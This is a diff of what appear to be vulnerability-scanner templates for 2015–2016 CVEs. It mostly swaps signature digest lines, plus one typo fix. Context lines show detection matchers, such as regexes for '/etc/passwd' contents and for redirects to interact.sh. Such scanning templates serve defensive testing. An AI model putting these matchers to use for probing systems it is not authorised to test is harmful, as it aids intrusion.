a/http/cves/2015/CVE-2015-20067.yaml +++ b/http/cves/2015/CVE-2015-20067.yaml @@ -45,4 +45,4 @@ http: - 'contains(header, "text/xml")' - 'contains_all(body, "title","wp:author_id","wp:author_email")' condition: and -# digest: 4a0a004730450221009ae41043aeb32a6f0efae515ca649908195bb81ab64c22ce1b473f6e2aead2bd02207348921f089efedaf797358ea22be64048e54ebd476ea7f8af97513b006bf6c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d4c3c8a7fdc18cc9462c2ff1355d9ed71c05410b6a47e49c34bf86bf83a0b2c202202a13e920f228d0071e72f33431c9108a38ddd87eb8cea4f84b92ea9147599a3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index 117633441a..bd3ab9b0c6 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ebe03d064bcc1c40ce10bef615b6a976d91392bf311d7d76d0f319078ac73e95022100924ff6e22d9e0c6c62c0b30f1ea9e5d32a4a8c29fb94036f8f77244739511e27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210098c40f6c8c0649ca609f84e623426e75d8b4585cd3c8a8170af7ad182b173602022039dd4d44ad7c15033383f04ab8c95596af9694c2bd91a5d278cd8c0211408051:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index 4a6b052616..db07a3904a 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220694be7145cfc1e6169eb0d365067e365d1af8d913b805e9fb13dd745d779977c0221009298b9cf788df2760dd8ca64a5b3829be18bffed91b756e80af6d3864b68c51a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201d5b527a7afaf9cd2298eecea9050abd7eb528161ddd9c8f6b3bb07fd1b3d401022100bc96b4607561b72a7ff1ebefd67594db87f556150aef7cee914c442f33c921bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml index c5c75b7943..affbf5e835 100644 --- a/http/cves/2015/CVE-2015-2080.yaml +++ b/http/cves/2015/CVE-2015-2080.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 400 -# digest: 4b0a00483046022100a37d9786a016958b944a7ce01b161ca49f0f93102a819724726b070ff1c66d810221008d8644ab286b880187de343f6bb929eef89f5d807cd9f631f09f59a1380a1025:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205c8d0476a6f051a3ec41adbc3bbb3c3df32392a0a2d380ba4f7a3c845cca139702206f3666b9266c8b39bb342ff44104fe3ccc5b32839313e08d76981ce2ebdc12e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index db3f8e572f..045252b92f 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204496aa332072fdddd14fb45a70b62c29024a76f84242dbbe6e17b725493a819e0221009b87a04b92d834961e46d0f472a5c86cba4727c3b6d2667a68ed2a0fda9c8337:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022005ae10e49409ebd18ff174804d7b53c1ab9d1306850dfaff9163b785375be21c022100a6d97e3ba5c48553ae5e792432ca523f33cda27717ef085f3013c21e3dce7465:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index 76ac2ae2e3..2e0903f253 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -44,4 +44,4 @@ http: - 'status_code == 200' - 'contains(body, "{\"status\":true,\"data\"")' condition: and -# digest: 4b0a00483046022100c509de6b22436e0ffccd3fb41b35f3cc4c47f5a53f30456e9f6bbfbe856766e6022100fc05e80f4ba93e2738966fe5fa199fc8d5085d287c960bf9f495cd9e8fdfd867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bd7e63311d4cf6f8337571a1a59b5d7011819ff9c6b2ff98931e30318db0adf3022100ffe10684ebe0641b20298ef67f1e62873e23b9e6fc44edd1b0cbc5127ab7103b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index 61f02d23d6..ca63cdd05e 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -56,4 +56,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "ab-google-map-travel")' condition: and -# digest: 490a0046304402203989e7a1bb42ee65a96e4bd9a9dfd6d1ff07b4fb8bd44f0b553d59b908a4e56b02206fd1e074d2691258d521e6942a6a24eab2ebb584acbc17db41c8bf14b4c24d11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022055ae70d7d5713b31c7892395eeb29679fec0d526796dbf5cf3bc8525a6ae656b022100bee2d864effb2cfa7a973a3c46998cbd696a0f33bc651e7cd035a5cc1d9ee339:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2794.yaml b/http/cves/2015/CVE-2015-2794.yaml index 64cb5027c1..54b047868a 100644 --- a/http/cves/2015/CVE-2015-2794.yaml +++ b/http/cves/2015/CVE-2015-2794.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: dotnetnuke product: dotnetnuke - fofo-query: app="DotNetNuke" + fofa-query: app="DotNetNuke" tags: cve2015,cve,dotnetnuke,auth-bypass,install http: @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205b931368f972e054b081418fdcdbd6d16c6c7a1ef76a663c0d9db9d8c3fc353f02207c5737d6057af1e35c3ca3e3687a60ef1bf3ba7e59e7d90e9a39bd6fabc3213a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100963e0da7dc7d871a054737b37e18f3cf4a88a499d60ab976e55a64b8b71b8f4802210098e0935f4fae3fb4f2771f8a890b65875b19cb5f1008ca03c9ac6ee6deebce71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index 3bdd0bd9e8..c809422ac2 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009e6c4f6817fc48584ff8c6d9742b8f3c5b3e5fb5be3ad0ead912d290c223c27c022100eb815b521fc14f8a5a8ce97db511db2e5c8ee159f164b5b6b88d2c897ef1d597:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206af8ad919b57abf1561411bbcd70fe3339a15c82fa5dc6923dd3dbf8893bd6270220233f9e60af28a2969a2f99cf697687f299d5c9b21fa207a5887c5bff960ba133:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index 70c597ee32..56ac0bbd61 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b299692bc914d49f2b7da02f7b47d5a552ea0cb4e07b74e1342af40923709371022100c54c4dfd9d341265affbffdce7674c6128b8e9d219662477a7086457624e422e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220312369a2b289aed97447a2b6f30dc5d2b433cdaaadac8006d3c5cdac9eac8bcb022100c6c5b7d290b6e9c305b740862e6371ed4874567dc834c7705e73d0655613aa73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index e48dd4a36e..df6b263f83 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml @@ -54,4 +54,4 @@ http: - data-session-id= case-insensitive: true condition: or -# digest: 4b0a00483046022100cf776e65388d9e9c4358e26046d1a1747a1eda32c669866f6a63e31d25120bb0022100c4f6928240dbce151613e01429fabc31536eaad3fd90e341935d642ccaf387ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c4b2125a78ee523a116fd826ab60375b59dd4e7783faf87bb57fdb018ec7183702203cd169073ca993580b1ad5b798b29f12ea43ea85d77a1f8eb1fce8095e0a0b34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml index a8dbae0716..e6b4ae1a4e 100644 --- a/http/cves/2015/CVE-2015-3648.yaml +++ b/http/cves/2015/CVE-2015-3648.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220654cacb9a48051b5c9b10479ff3de1833dbb52044424828b048e7a7b19798ac5022100f60b4bcd9a28e77348bae0e600cada7414259e8de460447766619adf7e72f0c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220648060aa6f48efed100d6c3af1a59ebd765dd1e5e395decdf098e3b2e8748309022065fdb6859c50c278bb5ead61bdc761c9fe3d5c922cdf04874d98784fe719eeb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index a8f87dbe1f..68f3b923e4 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -50,4 +50,4 @@ http: - type: regex regex: - "root:[x*]:0:0:" -# digest: 4a0a00473045022049299dd9f0b7512c3d0aa43924db16568a74dac8b65d00358780d674ac0d588c022100a4dc2c367fcbdef1e008eb932c2b3d092cc1516fe959111e3f22562620cb3fed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100811332ca629cdfca6539bfdc50c6dd662a8522787a0bac631ecd72efe29ffd1b022100a97dd795f5dc0cfa69a7ecc65c1707b84fdf96eba9cbaeacde39a1356bba27f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index a51cb7104f..dc67e6688d 100644 --- a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009b6bc4a96c04ae5cb8736b09aa61b3fcead75b3dff5262b21316323f8da2607a022023925c47a2d61d378aa55eb7e4b040060c6a120e5acab73e729cad57be2f97b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d90f99fa4301493aeb28357b0ea4b46a40cbec4e3b675583644ef665e08e35d802206e03ca08917179f4e6306da4db59165d5a748a0c444859583cc72335a9d4c673:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index 2988a0a2ff..f569a4a3d6 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml @@ -49,4 +49,4 @@ http: - 'status_code_2 == 200' - "contains(body_2, '') && contains(body_2, 'newstatpress')" condition: and -# digest: 4a0a00473045022100aa293b00a84c4419cba891a27d2c089516e5b2e2b79edf736ce1571effe6c53a02205d0e440066d8acde3bbb28a0c59f1ac66b348cdee2941fef73fa8428adeb365a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b0f2e30065dca077f71d175c0be5c923af94f47acfb9c5706268811d87855d9d0220589926117e2ba9dd25f96017a9e5ad2b082115c853eddbc7805ddf2ae30ab9b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index 1c42c420b5..7b9c50d4cb 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b6d8c34abe5c9071b633dbb3c4b18cc9266da0f561311e1720ed39e20a4b8c84022011c76f9490b57b9d91a3c75f9cab4e22da0c0fdaba635bae50af231fe50590ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202842932433472fb23fa32b0fb531bf216b2816d459a655b2302110a3b5e191d9022100bcc4cc9601e498334a410e1ff13dfec9aa1aca4ebca8ad7b044b4709e3ec4860:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml index 6fad7beea7..410e703f3e 100644 --- a/http/cves/2015/CVE-2015-4414.yaml +++ b/http/cves/2015/CVE-2015-4414.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207a23e4d6b3e2963cc463af9c1f70168d9d06828d004a0205cf1259f183e684110220213f77668bd7db2145b58489d881dcb313ba732685cd3dc977d2a717d3fa3b95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a1e96510bf46f0ef10d550a44e8008d7c94bdc586bca89d6326af5877a9aa00e0221009f73f1b77fe426015fe533efc27ee70158689c68e345cbcf26c1e772fdd9d695:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index 10205cbb3b..30e491e3ac 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203d8ab9699d1475f85e2e91170d70b89735c149bf9fab1b5fae0965f1d3e7dc9f022100aba1a2da32ddcb8648ce527be2991ab433b730df7bf66b9775080b1e5c70c8eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009504e159cca2e8deb672bbe64a5cb5a8e8ff799780737da40e678ffc7d3e8e32022100af48ee950842847322cef0c2137c1dcbeceda0acf700cdde60d7c2e7d1a02175:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index ca03f31ae1..cb04dbfe5c 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100c288dbcf72ae37519dce21552b69e39843ee04d92afe2c5b290442775da04420022100b9fcf08b5b193af91be907d96b3791529029b24141de2757fd020fd532c89d36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009ee0f100e63fe1fb1f2fce30cefa8ea106fd61cde30ad3bbfe3ca713cc92dec602210098683f371b4cedc1c1d7f39a8a6aba9b813b585294104980333339b5e76ce0a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index 8943193111..23b34974f9 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a004830460221009079d2f9199630765f0135f9173c3990aa50d61644a6684d9c50fa3906332cd9022100b75c19aa73f817a61295805557e566271a28b9fde42518e3635cb90c0c4f20a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202859b878c456815dc2de4f34ef7ce4fbb5ce6868f17e145a47e5df1cf4a008df022100e1c8f735f6d9f14d8b5ba3d296c48f6b74d7152c59bc4eee04a4f4ee38ea61b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index 7014c945e2..039fd0a3d6 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ef3ecf2d4ce7417d88559f8c9fb98bc7f2026293b42d5e054ba0a0909aa9238f022100c1c24f6356a106f302092372a722edaa0ab2f20dc1205770b8bd0465c55a37c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202cd291f5c987553fe7226cae955afcf8510a3d8336df8bd95ef30fd3b37acd6202210087d411bcb4248de1f5e045aa50a4ca6aee4f54950d3be9be44c2d64bd8b69287:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index 1559f4eb93..0fcc460443 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 400 -# digest: 4a0a00473045022040379bf3c6f267393aab46e13527a9a867b28c382dfc9368b31084595d5f52b50221009508867691d5fcdf9e50aeeed9c93ec2800b8d6870a338f9cb71a2c3a36ab4a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207c1a1828c260cd9afadd9844c9419a43cc0071d0c854a31ad8e4b6fabcb4d3720220461e43e06c10d317f6b91bfe48ee71c3848bd2d8dcb41ea01f454d3f3281c01a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index 875660acb3..4bb280a998 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml @@ -43,4 +43,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4b0a00483046022100d5fbecb825c30f179c8fbc602c92987c7ccd3287f643c1ef8256b18a0b6f58be0221009781ababb78e4bd8ce1f003a6f739af30b18e2a045e4e7677788ed6901c81545:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d1aafb8c10f1a664ef200cb0b07719e65cca20f646b773edd9631bbd351283b102206cf94666854313f20d7360c569b2d3fa912b5887a16ae63b1dcf827a26d04341:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index 575b5c3fff..aeb1876bf4 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204234408f7cddc1834c1a927cb7ee32721e5a2ebc03450edd6332bfd10920589102202b59b1e60bc3752fd75e83d39eb9f5ff5b5c7b182d09745cb8b9243a3737da74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220751822cd9a64218d991be21596af65185eb0cb7a0ce6a8784d0b16b796f15a2d02204fc11d32d252a9e44ee7344d48136104c33912494230c2b75ff8a3c2229b7761:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index 5a3f0bf95e..2691b887e5 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 500 -# digest: 4a0a004730450221009b784361b9e74e636b4a9c8a6e3a7aad726a7c43c7584c0b4e34272fc50f4ab50220754d2796ae0356cdb1fcc171ec6e4f9d3fede2c0637ac215010e2fe36521e2d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202263d3f945c0708bfa178b6c8d0508154a99c03081669fa093be19203c3a7e5b022100e9aa4c463965277d6a051f7f0feb71096361d86520eaab7a85c0efda4d469699:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index e682c9bd4b..7e072d80be 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022026f26929156c59a1ae4a2fe57a70ed71056ccb229c28e885e986486a4a0934d6022100a501b7fd5c036041bb4919732abb916a05a52485fdc4316150a5fc0d72289833:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022033310ce04e506b0032c6fb7238353cd6100a3065b45f93695cea8aa316876c630220603da199c7554c8cf879f5ebe7a88fbe5d407438fc5352e3673a1bf713b3685a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml index eee5eac6b7..f10ba6f11d 100644 --- a/http/cves/2015/CVE-2015-8349.yaml +++ b/http/cves/2015/CVE-2015-8349.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022021c416e94db769ce07e7360e697fe05327111b517bff163b8827baeb15177f1d0220192c1123a0479589d1c576f74f6d77c70dfdd18e9ec6abfdaa5b686cc78d3d2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e8c85a9f4b86dd8d0a78a921160b422af2c670de30733405b10f0ba61584956202204fc67969930e7cb905857f698dedf73948092520552cbf14d9a58f53aa98a869:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index e94178cdb8..72bff270c2 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "([A-Za-z0-9]+)<\/span>' internal: true part: body -# digest: 4a0a00473045022017d61faa6f3c5034fa72f6d0df96b69785334b4988eeac0ff42009020df74571022100a894ab07f288b532e79ae6dbf78e731c317aac278e477b4ee895859b0dc86ac5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022033411a2aca61b97b205301cdb8eef8ef57c3467165cbe4c0c9a9c547cb8965e50220406a74e33b928a171ca810378162a6b315449d70e1b8059b12a752a0d61c2229:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml index 6d862ce501..b08fbf231b 100644 --- a/http/cves/2016/CVE-2016-10134.yaml +++ b/http/cves/2016/CVE-2016-10134.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f853e89c19fd53863126aa9fcaefcb7cca73b3c21efcf2cdf2784624fc8aac1f02203ffed438db1ed38a6b0ffdae2906ee1bdbcd58f9afc570bf3c7b4edcc72c9002:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022002af95be90d34c083687132956f3fddac7b02d6c5bde40cad1957ff829e41a4b022100bec226073019d0c0c6a39cd446db71450cea262f0ed5a9b880e9b6c6fb46f340:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index 4be466ce48..c8b0252ad6 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022100abd8d33ee77f406269b458a7686f08a0169db203000f9f42865c9b93695f9b2702204dccc03a9ea6fa983043b9bfc004eee64f3f827bfeae64848f943b049867436c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e45cbb5ec1e7ce9a8197b7f9cbdc7f7bfb9d89d7e983f6768c0c94b05fd91dd1022100e883d7b49b27776141743b2d5eb0b5ab4e18468dce7bf589f9a2a0b02ad0b090:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml index 3fa9de418a..f9d85a4d80 100644 --- a/http/cves/2016/CVE-2016-10368.yaml +++ b/http/cves/2016/CVE-2016-10368.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 302 -# digest: 490a00463044022053236fc07e8f8bee772a2484bbde531f1e9da31dbcc8fc64ca4f7d969e8053b60220220f23fd5ddf52704bd9f0f029009bcaab6cf1b07e1d45ee99dbdbfdb5d220d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205efe425e5d9b18e4d0fbbc16efa3c8463f7588294009126f1ce333acc1f041de0220194d5a323c78df75dd1216016dc142581916068c79129fc2159ea61553b623b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10940.yaml b/http/cves/2016/CVE-2016-10940.yaml index 25729e34c0..9cb20d013b 100644 --- a/http/cves/2016/CVE-2016-10940.yaml +++ b/http/cves/2016/CVE-2016-10940.yaml @@ -55,4 +55,4 @@ http: - 'contains(body_2, "")' - '!contains(body_3, "")' condition: and -# digest: 490a0046304402206f986e2e8e00312fd66e66bfbdb578d11b40e111154e30fc43bb77fe4c863dc902203a3bd84d1a70284552b4ef163e0c5d07255d50cc61d08b6676aaceff46775231:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220699b403999a44dfa1c0a95c442149578cb0dba8769c29aff63008cc829004d2202201090107521d760927c5f1134bbceda7facb495a7c6291a6a0669d3ca7a6832ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10960.yaml b/http/cves/2016/CVE-2016-10960.yaml index 247a8066c7..d23cb08ade 100644 --- a/http/cves/2016/CVE-2016-10960.yaml +++ b/http/cves/2016/CVE-2016-10960.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f54d253672bb29700b99c245c7cc39854669ec857871d3cd047b777a76b7c1f0022004282e76832e3f997c71f4fba0532d77d367e6b9610b801c79130d90e5e3b134:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022028547f88cd5ee6349b8fce17ed0c1ebb51aaccf87c6ebb245512f16a9b0976f2022100a8c2ef6ffcfe5bd3d42a7330cbf6d03b61b9ff919f463b7838a8db77a1502946:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index 394b240e50..b90433e242 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -44,4 +44,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a0046304402206c1c28af27f012db0253f573751b1ebd915a98657aef808d8431e2bcec6dd2ba0220387eab06293e8cdadb50c8269a81be1faa9c889945302147102b4f0fdf7dc0e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202a0af6f4b5b74c37d86cf262d279ecf9a06914ec33fb6e7db00c710f0982ce60022100c68322772ed60b940af582741ea7d2816782e2641a7d654e563aa82ab3aedf98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index d981578b0c..fbbabd7b21 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -49,4 +49,4 @@ http: - "status_code_2==200" - "contains((body_2), '{{rand1}}')" condition: and -# digest: 4b0a00483046022100e9a1fbdbfc3616b49ba2ff15da5b5dd08fb202de9369c7c6010efa0102d73e16022100d50ec529a814a6b36b3eb213e293e3fe010363dda46ad10ffa16f6d20bdef479:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206b7bd3e2e8e6558b6bd1ed2ed9786d1aa61b2f80c5153900102307acfbd8680302204f6528318fe66f51da0b6a08ecc218072d115dbdc42a066c07081d1a0dc1c58d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index 6ab9a1e388..07d97735ed 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 400 -# digest: 4b0a004830460221008b7729a382a773b65fab145f5731f3aa4cfbe958f2c36d272751ab680d2e2afd022100f26d98be98796202aa450b495924df9f01a0c8c03d0cccd0cf9ca820eb0f012d:922c64590222798bb761d5b6d8e72950 \ No 